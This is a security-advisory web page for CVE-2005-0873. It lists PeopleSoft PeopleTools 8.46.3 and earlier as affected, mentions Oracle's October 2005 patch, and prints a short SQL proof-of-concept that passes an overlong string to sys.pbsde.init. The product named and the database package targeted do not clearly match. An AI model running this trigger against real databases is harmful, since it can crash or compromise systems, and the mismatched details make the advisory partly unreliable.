CVE-2005-0873

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam™
Beyond Security®

SecuriTeam™ Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

	SecuriTeam™ in Your Inbox

	E-mail this CVE-2005-0873 to a friend

New vulnerability?
New tool?
Tell us

Credit:
The information has been provided by Brian Carr; Sacha Faust ; Esteban Mart nez Fay ; Alexander Kornbrust.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Check for CVE-2005-0873

Vulnerability Assessment and Management.
Automated Pen Testing for 50 to 50,000 nodes
beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* PeopleSoft PeopleTools 8.46.3 and prior

Oracle has released a Critical Patch Update advisory for October 2005 to address these vulnerabilities. This Critical Patch Update addresses the vulnerabilities for supported releases. Earlier, unsupported releases are likely to be affected by the issues as well.

The following proof of concept code is available for DB27:
SQL> exec
sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A
NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA
RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO
N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL);
BEGIN
sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A
NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA
RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO
N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL); END;

CVE Information:
CVE-2005-0873

Disclosure Timeline:
Published: October 18 2005

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus